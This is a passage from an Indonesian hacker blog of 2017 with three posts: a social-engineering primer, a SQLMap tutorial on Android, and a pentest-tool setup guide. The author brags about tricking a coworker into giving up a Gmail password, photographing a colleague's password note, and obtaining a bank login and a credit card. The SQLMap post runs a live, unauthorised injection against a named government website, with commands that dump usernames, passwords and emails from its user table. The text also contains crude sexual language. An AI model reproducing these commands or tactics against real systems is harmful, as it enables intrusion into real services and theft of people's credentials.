No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation



Seal

Always Trust Yourself And Use Your Opportunity



Kamis, 17 Agustus 2017

Apa itu Social Engineering ?


kembali lagi dengan saya Yukinoshita 47 kali ini saya mau ngisi materi kuliah GSH lagi ya di portal belajar otodidak wkwkwkwkwk ya maklum kalimatnya jadi sopan gini biar berwibawa sedikit :*



Apa Itu Social Engineering ?

Pengertian Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi atau menguak suatu informasi rahasia. Social engineering umumnya dilakukan melalui telepon atau Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu.

Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun. Seperti metode hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.



Apa Saja Metode Social Engineering ?

Metode pertama adalah metode yang paling dasar dalam social engineering, dapat menyelesaikan tugas penyerang secara langsung yaitu, penyerang tinggal meminta apa yang diinginkannya: password, akses ke jaringan, peta jaringan, konfigurasi sistem, atau kunci ruangan. Memang cara ini paling sedikit berhasil, tapi bisa sangat membantu dalam menyelesaikan tugas penyerang.

Cara yang populer sekarang adalah melalui e-mail, dengan mengirim e-mail yang meminta target untuk membuka attachment yang tentunya bisa kita sisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.

Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan, sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

seperti kata DarkTerrorizt "berikan yang ia mau maka ia akan memberikan yang kamu mau"

Dini saya jelaskan seperti apa model Social Engineering yang menurut pengalaman saya pribadi yang pernah melakukan nya


  • Dumpster Diving
Dumpster diving adalah metode social engineering yang ditujukan untuk mengorek informasi lebih mendalam terkait target biasanya sang hacker akan rela ngorek-ngorek tong sampah atau nyamar jadi pemulung untuk mendapatkan secuil informasi


Dari gambar diatas salah satu contoh dumpster diving pernah gak kalian tiba-tiba dapat telepon dari operator telk*m, bank, dan lainnya bahkan dia tau nomor register, nama dan lainnya terus modus nya promosi dan lain-lain ternyata penipuan ya bisa jadi karena kesalahan kalian sendiri membuang struk, surat dari bank, hipotik dan lainnya di tong sampang tanpa membakar nya.

ingat cara mengantisipasi dari metode ini adalah rajin-rajin kalian bakar sampah :v






  • Langsung Via Telepon

    pernah kah kalian dapat telpon misal dari operator seluler dan lainnya si penelpon bilang "selamat anda memenangkan undian ********** dan mendapatkan hadiah mobil" pasti kalian yang bermental miskin senang nya kebangetan sampe salto 7 kali dan kemudian saking senang sampe lupa berpikir jernih kemudian si penelpon minta transfer sejumlah yang kata nya untuk pembayaran pajak dan BPKB mobil dan eng ing eng uang ditransfer mobil pun tak kunjung datang malah brosur nya pun gak dapat :v

    jadi cara penanganan model social engineering kayak gini jangan gampang percaya udah lah rejeki gak kemana kalo ditelpon dapat mobil udah lu bilang aja kek garasi penuh.

    bagi yang emang hobi ikut undian tolong dibaca dengan teliti syarat dan ketentuan nya.





  • Via Email, dan Media Komunikasi Lainnya

    ada beberapa tujuan terkait peretas atau hacker yang sering menggunakan social engineering dengan metode ini

    • Untuk penyerbaran Malware : biasanya para hacker menggunakan metode hacking stegosploit atau penyisipan malware ke dalam dokumen dan disebarkan via email secara acak tergantung motif hackernya ada yang ingin menebar ransomware, RAT, dan worm
    • Untuk mencuri akun via phising atau login palsu
    • Untuk information gathering biasanya hacker akan berpura-pura nyamar sebagai Technical Support menggunakan identitas atau atribut vendor dan mengontak administrator untuk mendapatkan akses ataupun data sensitif seperti username dan password
    • Hacker biasanya melakukan pendekatan langsung dengan target seperti nongkrong bareng target, atau kerja dengan target secara freelance kemudian mengambil celah dengan cara mengontak target untuk dimintai username dan password dengan alasan yang dibuat-dibuat namun masuk akal bagi target.

      saya sendiri juga pernah menggunakan metode ini pada saat itu saya bekerja freelance dengan si target ini dengan moment yang pas saya kontak target minta akun nya username dan password gmailnya untuk kepentingan verifikasi data :v

      no pic hoax kan ? ne gambar nya gw sensor ya demi keamanan


      1. solusi dari teknik social engineering ini adalah jangan mudah percaya kepada orang lain ingat jaman sekarang adalah jaman nya pengkhianat.




  • Menyusup Ke Target Langsung

    Metode ini cukup berbahaya dan bahkan di dunia per-hacker-an ini kalo ada hacker yang bisa menyusup langsung ke target untuk hacking ataupun social engineering ini pasti ia dipuji dan dianggap sangat hebat karena bernyali besar.

    Hacker biasanya datang ke Gedung atau bangunan target untuk menanam alat sadap, sniffing, atau mencari sticky notes yang berisi data sensitif

    saya sendiri juga pernah melakukan nya ya dipengalaman saya waktu itu dikantor kondisi kantor sepi ya saya lihat diatas dompet rekan kerja ada sebuat sticky note / memo isinya akun akun dia dan isinya username dan password nya jadi tanpa mengulur waktu langsung saya foto aja.

    ini foto nya sengaja saya sensor

  • saya juga pernah dapat bank login dengan menggunakan metode social engineering 


    saya juga pernah dapat kartu kredit dan discan langsung malah :v


    walaupun dapat saya tidak pernah sepeserpun mengambil uang nya karena waktu itu saya hanya mencoba aja dan ternyata bisa.

    jujur aja waktu melakukan social engineering ini adrenaline saya terpacu

    baiklah kurang lebih seperti itulah social engineering sebaiknya jangan pernah menyalahgunakan ilmu social engineering ini karena dampak negatif nya sangat besar baik terhadap diri kalian sendiri maupun orang lain ingatlah memang social engineering ini metode yg gak semua orang bisa ibarat nya seperti bakat khusus namun ingat ilmu social engineering ini seperti pisau bermata dua.

    jika saya menyalahgunakan ilmu yang saya miliki tentu saja sekarang saya tidak bisa posting di blog ini karena dilanda kasus dan masalah.

    artikel ini hanya untuk educational purpose only / hanya ilmu edukasi semata semua tergantung pada diri masing-masing aja mau jadi jahat atau jadi baik ?

    sekian dan terimakasih



    daftar pustaka
    https://id.wikipedia.org/wiki/Social_engineering_%28keamanan%29

    Menjalankan SQLMap di GNURoot Android


    Hai para hacker dan yang bukan hacker udah lah tong berhenti coli nape mending lu belajar bareng GSH disini :*

    Kali ini gw mau jelasin tutor yang sedikit berbeda dari biasanya yaitu menjalankan SQLMap di android

    buat kalian yang belum punya GNURoot Debian sebaiknya kalian baca tutorial ini dulu : Klik Di Sini ya

    jika sudah baca dan dipraktekkan kalian bisa lanjutkan untuk membaca tutorial ini :* dan buat yg mastah tanpa baca tutorial yang sebelum nya jg gpp.

    pertama pastikan GNURoot terinstall


    Kemudian buka GNURoot Debian


    alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.


    kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter


    kemudian install SQLMap dengan memasukkan perintah

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    kemudian tekan enter


    biarkan proses instalasi berjalan


    setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter


    beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter


    kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter


    mari kita coba langsung praktek live pentest dengan target nya https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah

    ./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs

    kemudian tekan enter


    biarkan proses scanning berjalan


    muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter


    biarkan proses injeksi SQL terus berjalan secara otomatis


    dan database nya ketemu cek gambar dibawah biar jelas


    disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah

    ./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table

    kemudian tekan enter


    setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3


    disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah

    ./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns

    kemudian tekan enter 


    biarkan proses scanning dan injeksi berjalan


    aahhh.... kimochi ketemu kolom nya :v


    kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah

    ./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump

    kemudian tekan enter.


    done :v


    gimana ya cara nya penggunaan nya kurang lebih sama dengan yang artikel sebelum nya yang di sini hanya saja beda nya platform aja gw bikin tutorial ini biar lu pade yang kerjaan nya sering koar-koar sambil coli ini ngerti.

    oke sekian dan terimakasih

    salam ngent*t

    Rabu, 16 Agustus 2017

    Menggunakan GNURoot Debian Sebagai Platform Pentest Di Smartphone Android






    Hai para hacker dan yang bukan hacker yang suka nonton bokep dan coli wkwkwkwkwk kali ini gw Yukinoshita 47 mau berbagi ilmu seperti biasanya yahh gw udah bosan ngedepes mulu ngejar-ngejar mirror -_- mending gw fokus ke pembangunan Komunitas Garuda Security Hacker ini :v

    kali ini gw mau bahas sebuah aplikasi platform dari core nya Debian di implementasikan ke Android dan tanpa harus ngeroot :* yaitu nama nya GNURoot Debian cocok buat lu yang berjiwa opreker nanggung atau opreker takut rusak :v wkwkwkwk

    oke fungsi nya adalah sebenarnya GNURoot Debian ini seperti teminal emulator yang dikemas dalam bentuk OS CLI atau non desktop jadi lu bisa merasakan aura Debian Linux di Perangkat smartphone lu.

    langsung aja pertama lu buka Playstore terus cari GNURoot Debian terus download seperti gambar dibawah ini.



    sabar tunggu proses nya


    iya jangan ngeluh tolo biarin aja download dulu aplikasi nya


    dan selesai langsung aja buka aplikasi nya


    biarkan GnuRoot nya menginstall libs dan setting-setting secara otomatis dulu


    selesai dan GNURoot siapdigunakan 


    selanjut nya kita harus mempersiapkan apa-apa saja yang diperlukan  untuk menggunakan GNURoot ini sebagai media pentest

    pertama update dulu repository nya dengan memasukkan perintah

    apt-get update

    kemudian tekan enter


    biarkan repository nya melakukan update paket paket yang diperlukan


    selanjut nya install git dan python pip karena 2 aplikasi ini berguna buat kepentingan pentest dan rata-rata tools dari python membutuhkan pip

    jadi masukkan perintah apt-get install git python-pip kemudian tekan enter


    tekan y kemudian tekan enter


    biarkan proses intall aplikasi nya berjalan



    oke selanjut nya install editor nano dengan memasukkan perintah apt-get install nano kemudian tekan enter



    kita coba jalankan dengan memasukkan perintah nano kemudian tekan enter


    sipp berjalan dengan baik :*

    Q : kenapa pake editor nano ?? kan masih ada vim, pico, dan midnight commander
    A : karena gw emang biasa pake editor nano ini dari awal kenal linux sampe sekarang  dan nano lebih simple

    karena ini di android fungsi tombol CTRL di keyboar adalah tombol volume down

    jadi untuk Save editan file nya adalah Volume Down + O
    untuk keluar dari editor nano adalah Volume Down + X



    setelah persiapan awal selesai kita coba dulu install tools security nya

    kita coba dulu install nmap dengan cara memasukkan perintah

    apt-get install nmap

    kemudian tekan enter


    tekan y kemudian tekan enter


    setelah selesai mari kita coba jalankan nmap nya dengan memasukkan perintah nmap kemudian tekan enter


    nmap berjalan dengan lancar jaya :*


    kita coba install nikto dengan masukkan perintah apt-get install nikto kemudian tekan enter setelah itu tekan y kemudian tekan enter lagi


    coba jalankan nikto dengan memasukkan perintah nikto kemudian tekan enter dan nikto pun berjalan dengan baik


    oke kita coba install tool crack password yang terkenal itu ya betul john the ripper caranya adalah dengan mamasukkan perintah apt-get install john kemudian tekan enter


    seperti biasa tekan y kemudian tekan enter


    coba jalankan john dengan memasukkan perintah john kemudian tekan enter


     dan john pun berjalan dengan baik dan benar wkwkwkwkw


    baiklah cukup sampai disini dulu ya nanti ada lanjutan nya kok tenang aja :* dah tengah malam ne Over Night Service wkwkwkwkwk

    sekian dan terimakasih salam ngent*t